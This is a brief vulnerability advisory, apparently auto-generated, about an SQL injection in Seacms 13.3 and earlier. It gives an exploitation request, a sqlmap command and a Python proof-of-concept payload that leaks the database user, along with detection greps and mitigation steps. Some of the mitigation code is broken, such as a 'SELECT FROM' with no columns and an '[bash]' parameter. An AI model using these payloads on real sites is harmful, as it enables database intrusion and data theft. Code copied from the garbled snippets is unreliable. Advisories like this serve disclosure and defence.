Seacms <=13.3 contains an unauthenticated SQL injection vulnerability in `admin_type_news.php` due to improper input sanitization. Attackers can exploit this by injecting malicious SQL queries through crafted HTTP requests, allowing database manipulation, data exfiltration, or remote code execution. The flaw occurs when user-supplied parameters are directly concatenated into SQL statements without proper escaping or prepared statements.
DailyCVE Form
Platform: Seacms
Version: <=13.3
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation:
GET /admin_type_news.php?typeid=1%20AND%201=CONVERT(int,(SELECT%20table_name%20FROM%20information_schema.tables))
Detection:
sqlmap -u "http://target/admin_type_news.php?typeid=1" --risk=3 --level=5
Mitigation:
1. Apply vendor patch immediately.
2. Use prepared statements:
$stmt = $pdo->prepare("SELECT FROM news WHERE typeid = ?");
$stmt->execute([bash]);
Log Analysis:
grep "admin_type_news.php" /var/log/apache2/access.log | grep -E "UNION|SELECT|CONVERT"
WAF Rule:
location ~ admin_type_news.php {
deny all;
}
Backup Verification:
mysqldump -u root -p seacms > seacms_backup.sql
Patch Validation:
diff -u admin_type_news.php admin_type_news.php.patched
Exploit PoC:
import requests
payload = "1 AND EXTRACTVALUE(0,CONCAT(0x5c,(SELECT user())))"
requests.get(f"http://victim/admin_type_news.php?typeid={payload}")
Post-Exploit Cleanup:
REVOKE ALL PRIVILEGES ON seacms. FROM 'webuser'@'%';
Emergency Response:
iptables -A INPUT -p tcp --dport 80 -s attacker_ip -j DROP
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25521
Extra Source Hub:
Undercode
